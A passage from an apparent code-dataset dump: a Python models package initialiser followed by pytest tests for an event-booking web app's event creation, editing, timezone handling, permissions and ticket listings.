|
py
|
Python
|
share/models/__init__.py
|
felliott/SHARE
|
8fd60ff4749349c9b867f6188650d71f4f0a1a56
|
[
"Apache-2.0"
] | null | null | null |
share/models/__init__.py
|
felliott/SHARE
|
8fd60ff4749349c9b867f6188650d71f4f0a1a56
|
[
"Apache-2.0"
] | null | null | null |
share/models/__init__.py
|
felliott/SHARE
|
8fd60ff4749349c9b867f6188650d71f4f0a1a56
|
[
"Apache-2.0"
] | null | null | null |
# NOTE: The order of these imports actually matter
from share.models.core import * # noqa
from share.models.ingest import * # noqa
from share.models.meta import * # noqa
from share.models.change import * # noqa
from share.models.agents import * # noqa
from share.models.creative import * # noqa
from share.models.base import ExtraData # noqa
from share.models.registration import * # noqa
from share.models.identifiers import * # noqa
from share.models.relations import * # noqa
from share.models.banner import * # noqa
# NOTE(review): share.models.ingest was already star-imported above; this
# second import looks redundant — confirm it is not relied on for import-order
# side effects before removing.
from share.models.ingest import * # noqa
from share.models.jobs import * # noqa
from share.models.sources import * # noqa
from share.models.celery import * # noqa
| 41.058824
| 50
| 0.749284
| 99
| 698
| 5.282828
| 0.282828
| 0.258126
| 0.43021
| 0.508604
| 0.644359
| 0.214149
| 0.214149
| 0.214149
| 0.214149
| 0.214149
| 0
| 0
| 0.163324
| 698
| 16
| 51
| 43.625
| 0.895548
| 0.176218
| 0
| 0.133333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5a2a38e95c45b8bc3c7ba901dc2ae4101f089560
| 75,553
|
py
|
Python
|
py/tests/test_events.py
|
samuelcolvin/nosht
|
9e4d9bea8ff6bfae86cae948cc3028ccc68d0188
|
[
"MIT"
] | 26
|
2018-07-28T23:11:27.000Z
|
2022-02-09T13:40:33.000Z
|
py/tests/test_events.py
|
samuelcolvin/nosht
|
9e4d9bea8ff6bfae86cae948cc3028ccc68d0188
|
[
"MIT"
] | 336
|
2018-05-25T17:57:00.000Z
|
2022-03-11T23:24:36.000Z
|
py/tests/test_events.py
|
samuelcolvin/nosht
|
9e4d9bea8ff6bfae86cae948cc3028ccc68d0188
|
[
"MIT"
] | 4
|
2018-07-18T08:37:19.000Z
|
2022-01-31T14:42:48.000Z
|
import re
from datetime import datetime, timedelta, timezone
from decimal import Decimal
import pytest
import pytz
from aiohttp import FormData
from pytest_toolbox.comparison import AnyInt, CloseToNow, RegexStr
from shared.utils import waiting_list_sig
from .conftest import Factory, create_image
async def test_event_public(cli, url, factory: Factory, db_conn):
    """GET event-get-public returns the full public payload (ticket types,
    event fields, existing tickets) for a published public event."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event(
        status='published', location_name='Testing Location', location_lat=51.5, location_lng=-0.5
    )
    # Resolve the category/event slugs the public URL is built from.
    cat_slug, event_slug = await db_conn.fetchrow(
        'SELECT cat.slug, e.slug FROM events AS e JOIN categories cat on e.category = cat.id WHERE e.id=$1',
        factory.event_id,
    )
    r = await cli.get(url('event-get-public', category=cat_slug, event=event_slug))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert data == {
        'ticket_types': [
            {'mode': 'donation', 'name': 'Standard', 'price': 10.0},
            {'mode': 'ticket', 'name': 'Standard', 'price': None},
        ],
        'event': {
            'id': factory.event_id,
            'category_id': factory.category_id,
            'name': 'The Event Name',
            'image': 'https://www.example.org/main.png',
            'secondary_image': None,
            'youtube_video_id': None,
            'short_description': RegexStr(r'.*'),
            'long_description': RegexStr(r'.*'),
            'description_intro': RegexStr(r'.*'),
            'description_image': None,
            'external_ticket_url': None,
            'external_donation_url': None,
            'allow_tickets': True,
            'allow_donations': False,
            'category_content': None,
            'location': {'name': 'Testing Location', 'lat': 51.5, 'lng': -0.5},
            'start_ts': '2032-06-28T19:00:00',
            'tz': 'BST',
            'duration': 3600,
            'tickets_available': None,
            'host_id': factory.user_id,
            'host_name': 'Frank Spencer',
            'ticket_extra_help_text': None,
            'ticket_extra_title': None,
            'allow_marketing_message': None,
            'booking_trust_message': None,
            'cover_costs_message': None,
            'cover_costs_percentage': None,
            'terms_and_conditions_message': None,
        },
        'existing_tickets': 0,
        'on_waiting_list': False,
    }
async def test_event_wrong_slug(cli, url, factory: Factory):
    """Unknown category/event slugs on the public endpoint return 404."""
    await factory.create_company()
    r = await cli.get(url('event-get-public', category='foobar', event='snap'))
    assert r.status == 404, await r.text()
async def test_event_not_public(cli, url, factory: Factory, db_conn):
    """A private event is hidden from the public endpoint (404, not found)."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event(public=False, status='published')
    cat_slug, event_slug = await db_conn.fetchrow(
        'SELECT cat.slug, e.slug FROM events AS e JOIN categories cat on e.category = cat.id WHERE e.id=$1',
        factory.event_id,
    )
    r = await cli.get(url('event-get-public', category=cat_slug, event=event_slug))
    assert r.status == 404, await r.text()
    assert {'message': 'event not found'} == await r.json()
async def test_private_event_good(cli, url, factory: Factory, db_conn, settings):
    """A private event is reachable via its signed private link."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event(public=False, status='published')
    # event_link() produces '/pvt/<cat>/<event>/<sig>/' signed with auth_key.
    event_link = await db_conn.fetchval(
        """
        SELECT event_link(cat.slug, e.slug, e.public, $2)
        FROM events AS e JOIN categories cat on e.category = cat.id WHERE e.id=$1
        """,
        factory.event_id,
        settings.auth_key,
    )
    _, cat_slug, event_slug, sig = event_link.strip('/').split('/')
    r = await cli.get(url('event-get-private', category=cat_slug, event=event_slug, sig=sig))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert data['event']['id'] == factory.event_id
async def test_private_event_bad_sig(cli, url, factory: Factory, db_conn, settings):
    """Tampering with the private-link signature yields 404 'event not found'."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event(public=False, status='published')
    event_link = await db_conn.fetchval(
        """
        SELECT event_link(cat.slug, e.slug, e.public, $2)
        FROM events AS e JOIN categories cat on e.category = cat.id WHERE e.id=$1
        """,
        factory.event_id,
        settings.auth_key,
    )
    _, cat_slug, event_slug, sig = event_link.strip('/').split('/')
    # Corrupt the signature by appending a character.
    r = await cli.get(url('event-get-private', category=cat_slug, event=event_slug, sig=sig + 'x'))
    assert r.status == 404, await r.text()
    assert {'message': 'event not found'} == await r.json()
async def test_bread_browse(cli, url, factory: Factory, login):
    """Admin event-browse lists all events, newest start time first."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event(public=False, status='published')
    london = pytz.timezone('Europe/London')
    await factory.create_event(name='second event', start_ts=london.localize(datetime(2032, 6, 30, 0, 0)))
    await login()
    r = await cli.get(url('event-browse'))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert data == {
        'items': [
            {
                'id': AnyInt(),
                'name': 'second event',
                'category': 'Supper Clubs',
                'status': 'pending',
                'highlight': False,
                'start_ts': '2032-06-30T00:00:00',
                'duration': 3600,
            },
            {
                'id': AnyInt(),
                'name': 'The Event Name',
                'category': 'Supper Clubs',
                'status': 'published',
                'highlight': False,
                'start_ts': '2032-06-28T19:00:00',
                'duration': 3600,
            },
        ],
        'count': 2,
        'pages': 1,
    }
async def test_bread_retrieve(cli, url, factory: Factory, login):
    """Admin event-retrieve returns every editable field plus the signed link."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event(
        public=False,
        status='published',
        youtube_video_id='abcxyz',
        short_description='xxx',
        long_description='yyy',
        description_intro='zzzz',
    )
    await login()
    r = await cli.get(url('event-retrieve', pk=factory.event_id))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert data == {
        'id': factory.event_id,
        'name': 'The Event Name',
        'category': 'Supper Clubs',
        'status': 'published',
        'highlight': False,
        'allow_donations': False,
        'allow_tickets': True,
        'start_ts': '2032-06-28T19:00:00',
        'timezone': 'Europe/London',
        'duration': 3600,
        'cat_id': factory.category_id,
        'public': False,
        'image': None,
        'secondary_image': None,
        'ticket_limit': None,
        'donation_target': None,
        'location_name': None,
        'location_lat': None,
        'location_lng': None,
        'youtube_video_id': 'abcxyz',
        'short_description': 'xxx',
        'long_description': 'yyy',
        'description_intro': 'zzzz',
        'description_image': None,
        'external_ticket_url': None,
        'external_donation_url': None,
        'host': factory.user_id,
        'host_name': 'Frank Spencer',
        'link': '/pvt/supper-clubs/the-event-name/8d2a9334aa29f2151668a54433df2e9d/',
    }
async def test_bread_browse_host(cli, url, factory: Factory, login):
    """A host browsing events only sees their own, not other hosts' events."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    await factory.create_event()
    u2 = await factory.create_user(email='u2@example.org')
    await factory.create_event(host_user_id=u2, name='another event')
    await login()
    r = await cli.get(url('event-browse'))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert data['count'] == 1
    assert data['pages'] == 1
    assert len(data['items']) == 1
async def test_bread_retrieve_host(cli, url, factory: Factory, login):
    """A host can retrieve their own event (200) but not another host's (404)."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    await factory.create_event()
    u2 = await factory.create_user(email='u2@example.org')
    e2 = await factory.create_event(host_user_id=u2, name='another event')
    await login()
    r = await cli.get(url('event-retrieve', pk=factory.event_id))
    assert r.status == 200, await r.text()
    r = await cli.get(url('event-retrieve', pk=e2))
    assert r.status == 404, await r.text()
async def test_event_categories(cli, url, factory: Factory, login):
    """event-categories lists the company's categories with type and pricing."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await login()
    r = await cli.get(url('event-categories'))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert data == {
        'categories': [
            {
                'id': factory.category_id,
                'name': 'Supper Clubs',
                'host_advice': None,
                'event_type': 'ticket_sales',
                'suggested_price': None,
            },
        ],
    }
async def test_create_event(cli, url, db_conn, factory: Factory, login, dummy_server):
    """event-add creates the event row, a default ticket type, and sends the
    'event created' notification email to admins."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await login()
    data = dict(
        name='foobar',
        category=factory.category_id,
        location={'lat': 50, 'lng': 0, 'name': 'London'},
        date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': 7200},
        timezone='Europe/London',
        long_description='# title\nI love to **party**',
        description_intro='some intro texxxt',
        youtube_video_id='abcxyz',
    )
    assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
    assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM ticket_types')
    r = await cli.json_post(url('event-add'), data=data)
    assert r.status == 201, await r.text()
    assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
    data = await r.json()
    event = dict(await db_conn.fetchrow('SELECT * FROM events'))
    event_id = event.pop('id')
    assert data == {'status': 'ok', 'pk': event_id}
    # Full row check: admin-created events are published immediately and the
    # short_description is derived from the markdown long_description.
    assert event == {
        'category': factory.category_id,
        'status': 'published',
        'host': factory.user_id,
        'name': 'foobar',
        'slug': 'foobar',
        'highlight': False,
        'allow_donations': False,
        'allow_tickets': True,
        'start_ts': datetime(2032, 2, 1, 19, 0, tzinfo=timezone.utc),
        'timezone': 'Europe/London',
        'duration': timedelta(seconds=7200),
        'youtube_video_id': 'abcxyz',
        'short_description': 'title I love to party',
        'long_description': '# title\nI love to **party**',
        'description_intro': 'some intro texxxt',
        'description_image': None,
        'external_ticket_url': None,
        'external_donation_url': None,
        'public': True,
        'location_name': 'London',
        'location_lat': 50.0,
        'location_lng': 0.0,
        'ticket_limit': None,
        'donation_target': None,
        'tickets_taken': 0,
        'image': None,
        'secondary_image': None,
    }
    # A default 'Standard' ticket type is created alongside the event.
    assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM ticket_types where mode=$1', 'ticket')
    tt = dict(await db_conn.fetchrow('SELECT event, name, price, slots_used, active FROM ticket_types'))
    assert tt == {
        'event': event_id,
        'name': 'Standard',
        'price': None,
        'slots_used': 1,
        'active': True,
    }
    assert len(dummy_server.app['emails']) == 1
    email = dummy_server.app['emails'][0]
    # debug(email)
    assert email['Subject'] == 'Update: Frank Spencer created an event "foobar"'
    assert email['part:text/plain'] == (
        f'Testing update:\n'
        f'\n'
        f'Event "foobar" (Supper Clubs) created by "Frank Spencer" (admin), click the link below to view the event.\n'
        f'\n'
        f'<div class="button">\n'
        f' <a href="https://127.0.0.1/dashboard/events/{event_id}/"><span>View Event</span></a>\n'
        f'</div>\n'
    )
async def test_create_private_all_day(cli, url, db_conn, factory: Factory, login):
    """Creating an event with dur=None makes an all-day event (midnight start,
    NULL duration), and public=False is persisted."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await login()
    data = dict(
        name='foobar',
        category=factory.category_id,
        public=False,
        location={'lat': 50, 'lng': 0, 'name': 'London'},
        date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': None},
        timezone='Europe/London',
        long_description='I love to party',
    )
    r = await cli.json_post(url('event-add'), data=data)
    assert r.status == 201, await r.text()
    assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
    public, start_ts, duration = await db_conn.fetchrow('SELECT public, start_ts, duration FROM events')
    assert public is False
    # All-day events are normalised to midnight with no duration.
    assert start_ts == datetime(2032, 2, 1, 0, 0, tzinfo=timezone.utc)
    assert duration is None
async def test_create_event_duplicate_slug(cli, url, db_conn, factory: Factory, login):
    """Creating two events with the same name appends a random 4-char suffix
    to the second slug to keep slugs unique."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await login()
    data = dict(
        name='foobar',
        category=factory.category_id,
        long_description='I love to party',
        timezone='Europe/London',
        date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': 3600},
    )
    assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
    r = await cli.json_post(url('event-add'), data=data)
    assert r.status == 201, await r.text()
    assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
    r = await cli.json_post(url('event-add'), data=data)
    assert r.status == 201, await r.text()
    assert 2 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
    slug1, slug2 = [r[0] for r in await db_conn.fetch('SELECT slug FROM events ORDER BY id')]
    assert slug1 == 'foobar'
    assert slug2 == RegexStr(r'foobar\-[A-Za-z0-9]{4}')
async def test_create_event_host(cli, url, db_conn, factory: Factory, login):
    """Events created by a pending host land in 'pending' status (not published)."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    await login()
    await db_conn.fetchval("UPDATE users SET status='pending'")
    data = dict(
        name='foobar',
        category=factory.category_id,
        long_description='I love to party',
        timezone='Europe/London',
        date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': 3600},
    )
    r = await cli.json_post(url('event-add'), data=data)
    assert r.status == 201, await r.text()
    assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
    status = await db_conn.fetchval('SELECT status FROM events')
    assert status == 'pending'
async def test_create_timezone(cli, url, db_conn, factory: Factory, login):
    """The supplied timezone is stored and the naive start time is converted
    to UTC relative to it (19:00 New York -> 23:00 UTC in June)."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await login()
    data = dict(
        name='foobar',
        category=factory.category_id,
        location={'lat': 50, 'lng': 0, 'name': 'London'},
        date={'dt': datetime(2032, 6, 1, 19, 0).isoformat(), 'dur': 7200},
        timezone='America/New_York',
        long_description='# title\nI love to **party**',
    )
    r = await cli.json_post(url('event-add'), data=data)
    assert r.status == 201, await r.text()
    assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
    data = await r.json()
    start_ts, tz = await db_conn.fetchrow('SELECT start_ts, timezone FROM events WHERE id=$1', data['pk'])
    assert tz == 'America/New_York'
    assert start_ts == datetime(2032, 6, 1, 23, 0, tzinfo=timezone.utc)
async def test_create_external_ticketing(cli, url, db_conn, factory: Factory, login):
    """Admins may set external_ticket_url; it is stored and exposed on the
    public event endpoint."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await login()
    data = dict(
        name='foobar',
        category=factory.category_id,
        location={'lat': 50, 'lng': 0, 'name': 'London'},
        date={'dt': datetime(2032, 6, 1, 19, 0).isoformat(), 'dur': 7200},
        external_ticket_url='https://www.example.com/the-test-event/',
        timezone='America/New_York',
        long_description='# title\nI love to **party**',
    )
    r = await cli.json_post(url('event-add'), data=data)
    assert r.status == 201, await r.text()
    assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
    data = await r.json()
    external_ticket_url = await db_conn.fetchval('SELECT external_ticket_url FROM events WHERE id=$1', data['pk'])
    assert external_ticket_url == 'https://www.example.com/the-test-event/'
    cat_slug, event_slug = await db_conn.fetchrow(
        'SELECT cat.slug, e.slug FROM events e JOIN categories cat on e.category = cat.id WHERE e.id=$1', data['pk']
    )
    r = await cli.get(url('event-get-public', category=cat_slug, event=event_slug))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert data['event']['external_ticket_url'] == 'https://www.example.com/the-test-event/'
async def test_create_event_host_external_ticketing(cli, url, db_conn, factory: Factory, login):
    """Non-admin hosts may NOT set external_ticket_url — 403 and no event created."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    await login()
    await db_conn.fetchval("UPDATE users SET status='pending'")
    data = dict(
        name='foobar',
        category=factory.category_id,
        long_description='I love to party',
        timezone='Europe/London',
        date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': 3600},
        external_ticket_url='https://www.example.com/the-test-event/',
    )
    r = await cli.json_post(url('event-add'), data=data)
    assert r.status == 403, await r.text()
    data = await r.json()
    assert data == {'message': 'external_ticket_url may only be set by admins'}
    assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
async def test_create_external_donations(cli, url, db_conn, factory: Factory, login):
    """Admins may set external_donation_url; it is stored and exposed on the
    public event endpoint."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await login()
    data = dict(
        name='foobar',
        category=factory.category_id,
        long_description='longgggg descriptionnnn',
        date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': 3600},
        timezone='America/New_York',
        external_donation_url='https://www.example.com/give-monies-now/',
    )
    r = await cli.json_post(url('event-add'), data=data)
    assert r.status == 201, await r.text()
    assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
    j = await r.json()
    external_donation_url = await db_conn.fetchval('SELECT external_donation_url FROM events WHERE id=$1', j['pk'])
    assert external_donation_url == data['external_donation_url']
    cat_slug, event_slug = await db_conn.fetchrow(
        'SELECT cat.slug, e.slug FROM events e JOIN categories cat on e.category = cat.id WHERE e.id=$1', j['pk']
    )
    r = await cli.get(url('event-get-public', category=cat_slug, event=event_slug))
    j = await r.json()
    assert r.status == 200, await r.text()
    assert j['event']['external_donation_url'] == data['external_donation_url']
async def test_create_event_host_external_donations(cli, url, db_conn, factory: Factory, login):
    """Non-admin hosts may NOT set external_donation_url — 403 and no event created."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    await login()
    await db_conn.fetchval("UPDATE users SET status='pending'")
    data = dict(
        name='foobar',
        category=factory.category_id,
        long_description='longgggg descriptionnnn',
        date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': 3600},
        timezone='America/New_York',
        external_donation_url='https://www.example.com/give-monies-now/',
    )
    r = await cli.json_post(url('event-add'), data=data)
    j = await r.json()
    assert r.status == 403, await r.text()
    assert j == {'message': 'external_donation_url may only be set by admins'}
    assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
async def test_create_bad_timezone(cli, url, factory: Factory, login):
    """An unknown timezone name is rejected with a 400 validation error."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await login()
    data = dict(
        name='foobar',
        category=factory.category_id,
        date={'dt': datetime(2032, 6, 1, 19, 0).strftime('%s'), 'dur': 7200},
        timezone='foobar',
        long_description='# title\nI love to **party**',
    )
    r = await cli.json_post(url('event-add'), data=data)
    assert r.status == 400, await r.text()
    data = await r.json()
    assert data == {
        'message': 'Invalid Data',
        'details': [{'loc': ['timezone'], 'msg': 'invalid timezone', 'type': 'value_error'}],
    }
async def test_not_auth(cli, url, db_conn, factory: Factory):
    """event-add without a login session returns 401 and creates nothing."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    data = dict(
        name='foobar',
        category=factory.category_id,
        location={'lat': 50, 'lng': 0, 'name': 'London'},
        date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': None},
        long_description='I love to party',
    )
    r = await cli.json_post(url('event-add'), data=data)
    assert r.status == 401, await r.text()
    assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
async def test_edit_event(cli, url, db_conn, factory: Factory, login):
    """event-edit updates ticket_limit/location, leaves allow_* flags alone,
    and records an 'edit-event' action for the editing user."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    ticket_limit, location_lat = await db_conn.fetchrow('SELECT ticket_limit, location_lat FROM events')
    assert ticket_limit is None
    assert location_lat is None
    data = dict(ticket_limit=12, location={'name': 'foobar', 'lat': 50, 'lng': 1})
    r = await cli.json_post(url('event-edit', pk=factory.event_id), data=data)
    assert r.status == 200, await r.text()
    assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
    ticket_limit, location_lat = await db_conn.fetchrow('SELECT ticket_limit, location_lat FROM events')
    assert ticket_limit == 12
    assert location_lat == 50
    allow_tickets, allow_donations = await db_conn.fetchrow('SELECT allow_tickets, allow_donations FROM events')
    assert (allow_tickets, allow_donations) == (True, False)
    action = await db_conn.fetchrow("SELECT * FROM actions WHERE type='edit-event'")
    assert action['user_id'] == factory.user_id
    assert action['event'] == factory.event_id
async def test_edit_event_date(cli, url, db_conn, factory: Factory, login):
    """Editing the date updates start_ts (naive input interpreted per event tz)."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    start_ts = await db_conn.fetchval('SELECT start_ts FROM events')
    assert start_ts == datetime(2032, 6, 28, 18, 0, tzinfo=timezone.utc)
    data = dict(date={'dt': datetime(2032, 1, 1, 12).isoformat(), 'dur': 3600})
    r = await cli.json_post(url('event-edit', pk=factory.event_id), data=data)
    assert r.status == 200, await r.text()
    start_ts = await db_conn.fetchval('SELECT start_ts FROM events')
    # January London time == UTC, so stored UTC value matches the input.
    assert start_ts == datetime(2032, 1, 1, 12, tzinfo=timezone.utc)
async def test_edit_event_timezone(cli, url, db_conn, factory: Factory, login):
    """Changing the event timezone shifts the UTC start_ts while keeping the local wall-clock time."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    start_ts, tz = await db_conn.fetchrow('SELECT start_ts, timezone FROM events')
    assert start_ts == datetime(2032, 6, 28, 18, 0, tzinfo=timezone.utc)
    # 18:00 UTC is 19:00 in Europe/London (BST) on that date
    start_ts_local = await db_conn.fetchval('SELECT start_ts AT TIME ZONE timezone FROM events')
    assert start_ts_local == datetime(2032, 6, 28, 19, 0)
    assert tz == 'Europe/London'
    data = dict(timezone='America/New_York')
    r = await cli.json_post(url('event-edit', pk=factory.event_id), data=data)
    assert r.status == 200, await r.text()
    start_ts, tz = await db_conn.fetchrow('SELECT start_ts, timezone FROM events')
    # UTC instant moved so that the local time is unchanged in the new zone
    assert start_ts == datetime(2032, 6, 28, 23, 0, tzinfo=timezone.utc)
    assert tz == 'America/New_York'
    start_ts_local = await db_conn.fetchval('SELECT start_ts AT TIME ZONE timezone FROM events')
    assert start_ts_local == datetime(2032, 6, 28, 19, 0)
async def test_edit_event_ticket_limit(cli, url, factory: Factory, login):
    """Lowering ticket_limit below the number of tickets already booked is rejected with 400."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event(ticket_limit=20)
    await login()
    anne = await factory.create_user(first_name='x', email='anne@example.org')
    ben = await factory.create_user(first_name='x', email='ben@example.org')
    # book two free tickets so the limit can't be reduced to 1
    await factory.book_free(await factory.create_reservation(anne, ben), anne)
    r = await cli.json_post(url('event-edit', pk=factory.event_id), data=dict(ticket_limit=1))
    assert r.status == 400, await r.text()
    data = await r.json()
    assert data['details'][0]['msg'] == 'May not be less than the number of tickets already booked.'
async def test_edit_past_event(cli, url, db_conn, factory: Factory, login):
    """A host can edit a future event but gets 404 once the event's start_ts is in the past."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    await factory.create_event()
    await login()
    r = await cli.json_post(url('event-edit', pk=factory.event_id), data=dict(ticket_limit=12))
    assert r.status == 200, await r.text()
    assert 12 == await db_conn.fetchval('SELECT ticket_limit FROM events')
    assert 1 == await db_conn.fetchval("SELECT COUNT(*) FROM actions WHERE type='edit-event'")
    # move the event into the past; a second edit must now fail and change nothing
    await db_conn.execute("UPDATE events SET start_ts=now() - '1 hour'::interval")
    r = await cli.json_post(url('event-edit', pk=factory.event_id), data=dict(ticket_limit=100))
    assert r.status == 404, await r.text()
    assert 12 == await db_conn.fetchval('SELECT ticket_limit FROM events')
    assert 1 == await db_conn.fetchval("SELECT COUNT(*) FROM actions WHERE type='edit-event'")
async def test_set_event_status(cli, url, db_conn, factory: Factory, login):
    """event-set-status moves an event from 'pending' to 'published'."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    assert 'pending' == await db_conn.fetchval('SELECT status FROM events')
    r = await cli.json_post(url('event-set-status', id=factory.event_id), data=dict(status='published'))
    assert r.status == 200, await r.text()
    assert 'published' == await db_conn.fetchval('SELECT status FROM events')
async def test_set_event_status_bad(cli, url, db_conn, factory: Factory, login):
    """An invalid status value is rejected with a pydantic enum validation error and no change."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    assert 'pending' == await db_conn.fetchval('SELECT status FROM events')
    r = await cli.json_post(url('event-set-status', id=factory.event_id), data=dict(status='foobar'))
    assert r.status == 400, await r.text()
    data = await r.json()
    # exact pydantic v1 enum error payload
    assert data == {
        'message': 'Invalid Data',
        'details': [
            {
                'loc': ['status'],
                'msg': "value is not a valid enumeration member; permitted: 'pending', 'published', 'suspended'",
                'type': 'type_error.enum',
                'ctx': {'enum_values': ['pending', 'published', 'suspended']},
            },
        ],
    }
    assert 'pending' == await db_conn.fetchval('SELECT status FROM events')
async def test_set_event_status_host_not_active(cli, url, db_conn, factory: Factory, login):
    """A host whose user status is 'pending' cannot publish their event (403)."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    await factory.create_event()
    await login()
    # deactivate the host after login
    await db_conn.execute("UPDATE users SET status='pending'")
    r = await cli.json_post(url('event-set-status', id=factory.event_id), data=dict(status='published'))
    assert r.status == 403, await r.text()
    data = await r.json()
    assert data == {'message': 'Host not active'}
    assert 'pending' == await db_conn.fetchval('SELECT status FROM events')
async def test_set_event_status_missing_event(cli, url, factory: Factory, login):
    """Setting the status of a non-existent event id returns 404."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await login()
    r = await cli.json_post(url('event-set-status', id=999), data=dict(status='published'))
    assert r.status == 404, await r.text()
async def test_set_event_status_wrong_host(cli, url, db_conn, factory: Factory, login):
    """A host cannot change the status of another host's event (403)."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    user2 = await factory.create_user(role='host', email='user2@example.org')
    # the event belongs to user2, but the first user is logged in
    await factory.create_event(host_user_id=user2)
    await login()
    r = await cli.json_post(url('event-set-status', id=factory.event_id), data=dict(status='published'))
    assert r.status == 403, await r.text()
    data = await r.json()
    assert data == {'message': 'user is not the host of this event'}
    assert 'pending' == await db_conn.fetchval('SELECT status FROM events')
async def test_event_tickets_host(cli, url, db_conn, factory: Factory, login):
    """A host sees tickets and the waiting list, without guest/buyer email fields (contrast with the admin test)."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    await factory.create_event(price=10)
    user2_id = await factory.create_user(first_name='guest', last_name='guest', email='guest@example.org', role='guest')
    res = await factory.create_reservation(user2_id)
    await factory.buy_tickets(res)
    await login()
    anne = await factory.create_user(first_name='anne', last_name='anne', email='anne@example.org')
    await db_conn.execute('insert into waiting_list (event, user_id) values ($1, $2)', factory.event_id, anne)
    r = await cli.get(url('event-tickets', id=factory.event_id))
    assert r.status == 200, await r.text()
    data = await r.json()
    ticket_id = await db_conn.fetchval('SELECT id from tickets')
    assert data == {
        'tickets': [
            {
                'id': ticket_id,
                # public ticket id is a 7-char prefix followed by the numeric id
                'ticket_id': RegexStr(r'.{7}-%s' % ticket_id),
                'ticket_status': 'booked',
                'extra_info': None,
                'booked_at': CloseToNow(delta=4),
                'booking_type': 'buy-tickets',
                'price': 10,
                'extra_donated': None,
                'guest_user_id': user2_id,
                'guest_name': None,
                'buyer_user_id': user2_id,
                'buyer_name': 'guest guest',
                'ticket_type_name': 'Standard',
                'ticket_type_id': await db_conn.fetchval('SELECT id from ticket_types'),
            },
        ],
        'waiting_list': [{'added_ts': CloseToNow(delta=4), 'name': 'anne anne'}],
        'donations': [],
    }
    # a null price must round-trip as None in the response
    await db_conn.execute('update tickets set price=null')
    r = await cli.get(url('event-tickets', id=factory.event_id))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert len(data['tickets']) == 1
    assert data['tickets'][0]['price'] is None
async def test_event_tickets_admin(cli, url, db_conn, factory: Factory, login):
    """An admin sees tickets and the waiting list including guest/buyer email addresses."""
    await factory.create_company()
